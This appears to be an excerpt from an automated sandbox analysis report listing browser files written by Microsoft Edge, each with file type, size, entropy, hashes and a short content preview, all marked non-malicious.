                                                                                                                                                                  SHA-512:78B14F60F2D80400FE50360CF303A961685396B7697775D078825A29B717081442D357C2039AD0984D4B622976B0314EDE8F478CDE320DAEC118DA546CB0682A
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"net":{"http_server_properties":{"servers":[],"version":5}}}
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):61
                                                                                                                                                                  Entropy (8bit):3.926136109079379
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:YLb9N+eAXRfHDH2LSL:YHpoeSL
                                                                                                                                                                  MD5:4DF4574BFBB7E0B0BC56C2C9B12B6C47
                                                                                                                                                                  SHA1:81EFCBD3E3DA8221444A21F45305AF6FA4B71907
                                                                                                                                                                  SHA-256:E1B77550222C2451772C958E44026ABE518A2C8766862F331765788DDD196377
                                                                                                                                                                  SHA-512:78B14F60F2D80400FE50360CF303A961685396B7697775D078825A29B717081442D357C2039AD0984D4B622976B0314EDE8F478CDE320DAEC118DA546CB0682A
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"net":{"http_server_properties":{"servers":[],"version":5}}}
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):36864
                                                                                                                                                                  Entropy (8bit):1.2127408516412534
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:TFkIopKWurJNVr1GJmA8pv82pfurJNVrdHXuccaurJN2VrJ1n4n1GmzNGU1cSBTe:JkIEumQv8m1ccnvS6AqEtv
                                                                                                                                                                  MD5:4AD3728A8FF3FA9E431B81F92564E24C
                                                                                                                                                                  SHA1:BB8B23168C3B6DD6AAF99EB8E9A69ACA7637EEC3
                                                                                                                                                                  SHA-256:496D1426382D526217195BE46C0C315980C5206B9B70E6EB4693FC745110B5E5
                                                                                                                                                                  SHA-512:6325474F12FFBCA6A4CA87D5346D8B4DE620F0573666EFC2478871525EEB8C96DE4EEA5AB323AE1CF908B1BC40DA8155C17C06379C0E8369BCB48001E5DE7526
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:[]
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):40
                                                                                                                                                                  Entropy (8bit):4.1275671571169275
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                  MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                  SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                  SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                  SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):203
                                                                                                                                                                  Entropy (8bit):5.4042796420747425
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6:YAQN1iL50xHA9vh8wXwlmUUAnIMp5sXX2SQ:Y45Sg9vt+UAnIXZQ
                                                                                                                                                                  MD5:24D66E5F1B8C76C76511DA68057CDE5E
                                                                                                                                                                  SHA1:70225FEC1AE3FEF8D8A767D9EA0B0E108BF8F10D
                                                                                                                                                                  SHA-256:D5CB3A4A104E2EC4F13E8B4CDF3BD469E0AB638713928BEA1EAEAF03998B794C
                                                                                                                                                                  SHA-512:1CA093B4BB4E0B3EE0B791AD0E6B39AC9640CEB6ED005BD10A10B4AF904858F4898D86D26B60B625CDA9425FF317C6B9FE0DF2E12C897A52720AF775B19491AA
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"expect_ct":[],"sts":[{"expiry":1727869700.805692,"host":"dUymlFcJcEIuWrPNRCRXYtREHxXDHdPfT47kO1IQnQ0=","mode":"force-https","sts_include_subdomains":true,"sts_observed":1696333700.805702}],"version":2}
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):36864
                                                                                                                                                                  Entropy (8bit):0.36515621748816035
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:TLH3lIIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:Tb31DtX5nDOvyKDhU1cSB
                                                                                                                                                                  MD5:25363ADC3C9D98BAD1A33D0792405CBF
                                                                                                                                                                  SHA1:D06E343087D86EF1A06F7479D81B26C90A60B5C3
                                                                                                                                                                  SHA-256:6E019B8B9E389216D5BDF1F2FE63F41EF98E71DA101F2A6BE04F41CC5954532D
                                                                                                                                                                  SHA-512:CF7EEE35D0E00945AF221BEC531E8BF06C08880DA00BD103FA561BC069D7C6F955CBA3C1C152A4884601E5A670B7487D39B4AE9A4D554ED8C14F129A74E555F7
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1388
                                                                                                                                                                  Entropy (8bit):5.288839855706019
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:YXssZVMdBsI77ZFRudFGcsxuiZFGJ/NsC7Z6ma3yeebsaVZC52HObG7nby:YXsU8s01fcdsHgnsaleebsajCgHObZ
                                                                                                                                                                  MD5:F9BEE451D45B3DE2164CC237F98A257C
                                                                                                                                                                  SHA1:336207FC4FE47043691771F83028F9A4CBAB8158
                                                                                                                                                                  SHA-256:7E3851D886960115B37973B6B2914516E461BF6CE445CA1972B5D05203A7CD85
                                                                                                                                                                  SHA-512:2445C4BC7ACB4C72ACCF90AFC737ED6AE0DB0FAF24C0F43C5B53F89658168609FFA447B06C42C9BBD17F75F82E253FAEA6F78A643995BEC4E72E64F0D3DFDEAA
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13383267478221012","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com"},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13383267480209019","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com"},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13383267494223752","port":443,"protocol_str":"quic"}],"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://www.googleapis.com"},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13380769098373858","port":443,"protocol_str":"quic"}],"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA=",false],"server":"https://msedgeextensions.sf.tlu.dl.delivery
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                  Entropy (8bit):0.6852315298663104
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:TLiOUOq0afDdWec9sJEpMl741miI7J5fc:TOOUzDbg39pMldc
                                                                                                                                                                  MD5:19F8A237057D855585E293B39C348D63
                                                                                                                                                                  SHA1:6DFC800D2C67A332B72884BDDEDE8A231EAEB35F
                                                                                                                                                                  SHA-256:86E8C808D16056DAFA4449DE639D0C5F372B654C319516D5FC598DDD7FC4045E
                                                                                                                                                                  SHA-512:FFD7FDF11BC4C78963D8420DE2E1BDCC611ADB93FE5F9D094BBE1C79D1E1A4D0CD3A95EF60760A6BFB719170DBD0DE1929AB28D0268E7A02B489E0F84E71078B
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):12228
                                                                                                                                                                  Entropy (8bit):5.0669605446084525
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:sVsJ9pQTryZigaba4uypYJVelaYM0d8fpj+Fl0QAby+df:sVsLA3u4YJVelqpUqQK3
                                                                                                                                                                  MD5:54A1373EB2076976B659C8023D97DD71
                                                                                                                                                                  SHA1:A7419FA658158C043F4584712671B3419DF5F648
                                                                                                                                                                  SHA-256:6FF1660046C3EE82A7DBC5227F68734DC96387D12BFBD2FAD517CB476359DFF5
                                                                                                                                                                  SHA-512:1B0C05C9171429BE69BDF948B283554587E42FA0BE5810200DF820DFA7E91656C4FF61A40DA8AD8D0C298CA2C4FA2FC8097FFEBAEDB3E482CAB7ED5F0A410B91
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13380675474983220","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117794":{"last_path":""},"380c71d3-10bf-4a5d-9a06-c932e4b7d1d8":{"last_path":""},"3a2f4dee-d482-4ef8-baef-cb22b649608c":{"last_path":""},"3b5ee6f6-5322-4061-81e4-d976818
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):33
                                                                                                                                                                  Entropy (8bit):4.051821770808046
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:YVXADAEvTLSJ:Y9AcEvHSJ
                                                                                                                                                                  MD5:2B432FEF211C69C745ACA86DE4F8E4AB
                                                                                                                                                                  SHA1:4B92DA8D4C0188CF2409500ADCD2200444A82FCC
                                                                                                                                                                  SHA-256:42B55D126D1E640B1ED7A6BDCB9A46C81DF461FA7E131F4F8C7108C2C61C14DE
                                                                                                                                                                  SHA-512:948502DE4DC89A7E9D2E1660451FCD0F44FD3816072924A44F145D821D0363233CC92A377DBA3A0A9F849E3C17B1893070025C369C8120083A622D025FE1EACF
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"preferred_apps":[],"version":1}
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):34462
                                                                                                                                                                  Entropy (8bit):5.558788214244173
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:768:fgkBlZWPOkfUl8F1+UoAYDCx9Tuqh0VfUC9xbog/OVxCVw3rwyTTDdKpvtu6:fgkBlZWPOkfUlu1jagEwkyTt6t1
                                                                                                                                                                  MD5:C5ACC78339F79F1814A1509DCF475755
                                                                                                                                                                  SHA1:157B6BAEBDA80954E7146017456139E44AA94664
                                                                                                                                                                  SHA-256:61FD1E345F09C2E2A90C65A59F8C65C84A665CC6DCEE069F81AE3B198A6B23E5
                                                                                                                                                                  SHA-512:08027B14E071D2A3CC4A7E9756C135D407C76AC78A076B1F19437889DAB29AFE1E2085C58D1138DAABCA6976A2AD2DA9C0AD5B2DE1BA5790AD22CEAE1966DEE1
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13380675474265892","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13380675474265892","location":5,"ma
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:MANIFEST-000001.
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):2394
                                                                                                                                                                  Entropy (8bit):5.807278033267805
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:F2xc5NmccncmoDCRORpllg2hEEfRHGbldCRORpllg2hR7yHXFCRORpllg2hEnRHv:F2emlMrd6EfBirdn2Hvrd6nBXrd1Bx
                                                                                                                                                                  MD5:E26A8488EB798ED79B7BB5213D7467CF
                                                                                                                                                                  SHA1:874979916A2D798E1994914D91C0BAC017A54EC4
                                                                                                                                                                  SHA-256:527BD7FB01441201B7FF90DA2BAA9A39F1895A489E710F4C959C32220AA690F8
                                                                                                                                                                  SHA-512:DE196099B7B698547F7895DA547DF5835BF7C3467C8331D68C93817A52DFE41B572F6CDC35D222C5F41B8A142A038BD3E633C4207A967986DB0DA9DD1396B42B
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:....I................URES:0...INITDATA_NEXT_RESOURCE_ID.1..INITDATA_DB_VERSION.2l.7.................INITDATA_NEXT_REGISTRATION_ID.1..INITDATA_NEXT_VERSION_ID.1.+INITDATA_UNIQUE_ORIGIN:https://ntp.msn.com/...REG:https://ntp.msn.com/.0......https://ntp.msn.com/edge/ntp...https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true&enableWidgetsRegion=true .(.0.8........@...Z.b.....trueh..h..h..h..h..h..h..h..h..h..h.!p.x.................................REGID_TO_ORIGIN:0.https://ntp.msn.com/..RES:0.0.......https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmpt
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:MANIFEST-000001.
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):295
                                                                                                                                                                  Entropy (8bit):5.183883386369156
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6:iO/3QQERM1wkn23oH+TcwtE/a252KLl9mq2Pwkn23oH+TcwtE/a2ZIFUv:7/gRRrfYeb8xLzmvYfYeb8J2FUv
                                                                                                                                                                  MD5:B5473A186501784C47097A7E1FD8EBED
                                                                                                                                                                  SHA1:AEA57F6AFBCA6140227B1CFB1655E5AB62BD1D09
                                                                                                                                                                  SHA-256:AC064A872C5B116DD73B076698A1B31564849ED00CAABE9693F548C600A76326
                                                                                                                                                                  SHA-512:FF66CF1A60925978F98450662B51D666FE95C71AA3F18704580F3CBA3D695E55CEED124E552765A2047A151E94F85E26FFD44A30CF868A82979A440B74681DFA
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:2025/01/06-17:18:06.138 d04 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database since it was missing..2025/01/06-17:18:06.163 d04 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database/MANIFEST-000001.
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:OpenPGP Secret Key
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):41
                                                                                                                                                                  Entropy (8bit):4.704993772857998
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                  MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                  SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                  SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                  SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):115273
                                                                                                                                                                  Entropy (8bit):5.578961166434388
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:1536:sU906yxPXfOxr1lhCe1nL/ImL/rBZXJCjPXNtrbXMTQ12Vv:B9LyxPXfOxr1lMe1nL/5L/TXJ6zQ0C
                                                                                                                                                                  MD5:2CA47C0F5EE979EC5FC813E9F7C01C37
                                                                                                                                                                  SHA1:B93D0787AEB9E04C36B4860AC7CE4EA61D905AC4
                                                                                                                                                                  SHA-256:397ED8197C5C1388B9E6A634528EDDF7D76F2C1415A59CB40E6C0D557791F310
                                                                                                                                                                  SHA-512:1B54869864BFBA7B0B8D43C4F79CA5A2C5E5DF212778AC505DCB1EFC72AD5614A6450A8D1DB955F306D3A43ED5D13344F50C338612D09DADD013FE4866917930
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:0\r..m..........rSG.....0!function(e,t){if("object"==typeof exports&&"object"==typeof module)module.exports=t();else if("function"==typeof define&&define.amd)define([],t);else{var s=t();for(var n in s)("object"==typeof exports?exports:e)[n]=s[n]}}(self,(()=>(()=>{"use strict";var e={894:()=>{try{self["workbox:cacheable-response:6.4.0"]&&_()}catch(e){}},81:()=>{try{self["workbox:core:6.4.0"]&&_()}catch(e){}},485:()=>{try{self["workbox:expiration:6.4.0"]&&_()}catch(e){}},484:()=>{try{self["workbox:navigation-preload:6.4.0"]&&_()}catch(e){}},248:()=>{try{self["workbox:precaching:6.4.0"]&&_()}catch(e){}},492:()=>{try{self["workbox:routing:6.4.0"]&&_()}catch(e){}},154:()=>{try{self["workbox:strategies:6.4.0"]&&_()}catch(e){}}},t={};function s(n){var a=t[n];if(void 0!==a)return a.exports;var r=t[n]={exports:{}};return e[n](r,r.exports,s),r.exports}s.g=function(){if("object"==typeof globalThis)return globalThis;try{return this||new Function("return this")()}catch(e){if("object"==typeof window
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):189849
                                                                                                                                                                  Entropy (8bit):6.388422592238106
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3072:Nob67lwlvew7DimnVIL/Fr6U9XtJAUEH53ipbt:GewqmnKL/F+OTAQL
                                                                                                                                                                  MD5:3313DB66088908126229F22A3EB3986D
                                                                                                                                                                  SHA1:9D5EE5636E48033F620E864582B15169AAE3A704
                                                                                                                                                                  SHA-256:0E9746672626354031FF156DF3A36A610DDDBE6C2CB6EF6CBBD322D948310226
                                                                                                                                                                  SHA-512:073E19431CB7C1C5E186F6B23B29AD023A1BF1A3C7621BCB227B137D905A5511BCF39C49AAE9B91CBA63CEA53FA4C0A851FB7095F0B91E8A712C33787A03C341
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:0\r..m..........rSG.....0....Lp.................;\......*@........,T.8..`,.....L`.....,T...`......L`......Rc6u......exports...Rc:......module....RcF..W....define....Rb..[n....amd....D..H...........".. ...".. ...!...a..2....]".. ...!...-.....!...|..c.....>a...8v............*.........".. ...!........./..4.....).....$Sb............I`....Da......... ..f..........`...p...0...j...p..H........Q...&.d.{...https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true&enableWidgetsRegion=true.a........Db............D`.....E..A.`............,T.,.`......L`.....,T...`>....DL`.....DSb.....................q...1.c................I`....Da.....`...,T.`.`z.....L`..........a............a.........Dr8..............
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):24
                                                                                                                                                                  Entropy (8bit):2.1431558784658327
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:m+l:m
                                                                                                                                                                  MD5:54CB446F628B2EA4A5BCE5769910512E
                                                                                                                                                                  SHA1:C27CA848427FE87F5CF4D0E0E3CD57151B0D820D
                                                                                                                                                                  SHA-256:FBCFE23A2ECB82B7100C50811691DDE0A33AA3DA8D176BE9882A9DB485DC0F2D
                                                                                                                                                                  SHA-512:8F6ED2E91AED9BD415789B1DBE591E7EAB29F3F1B48FDFA5E864D7BF4AE554ACC5D82B4097A770DABC228523253623E4296C5023CF48252E1B94382C43123CB0
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:0\r..m..................
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):72
                                                                                                                                                                  Entropy (8bit):3.5931902015385067
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:HALtAyXl/l7n/lxEstllTXWNn:gLyKEs8N
                                                                                                                                                                  MD5:0BAE4AE3A96D1568B5AF281682EAE4E4
                                                                                                                                                                  SHA1:1443E27122F3BE7C8671E53C5657DF3B58BD26EE
                                                                                                                                                                  SHA-256:DF33AC5B5FE6E26E6552805FF4DB4B3FF7F72FE9FBCC017ED0982B883512994E
                                                                                                                                                                  SHA-512:08F035FF499C31B47D49ED54003D2DC300AFBEB37327A5EFD102FB4EED268D9EAED0E2E47372B8E24A51B6473CBBBCB0A1053279A8DCB1AAC9486167AAB84FA7
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:@...2%..oy retne.........................X....,.................GPI../.
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):6307
                                                                                                                                                                  Entropy (8bit):3.394463734743451
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:1YsQFUS8Z+A9XT+2BKUUDcLl9iSrlKyYH+:1UFUS49XT+2MyLl9iSrcBH+
                                                                                                                                                                  MD5:3EFB057EF549230CF851BDCA35B91662
                                                                                                                                                                  SHA1:51BC171F94EBF0D77387E9263F04447E06E838E4
                                                                                                                                                                  SHA-256:135A2E1BE4CB4773938BDD8AB95A1784332C5FD4A132605036B9E0BA45369948
                                                                                                                                                                  SHA-512:7EB236DA2FA4B51625934B65AEA3D563BFC1C87C1F6153DEAF36392B62991215898AB70EAB72D8C9A3FA10D33D00141836F9EF596873C280E8B4E76A7CA9126B
                                                                                                                                                                  Malicious:false
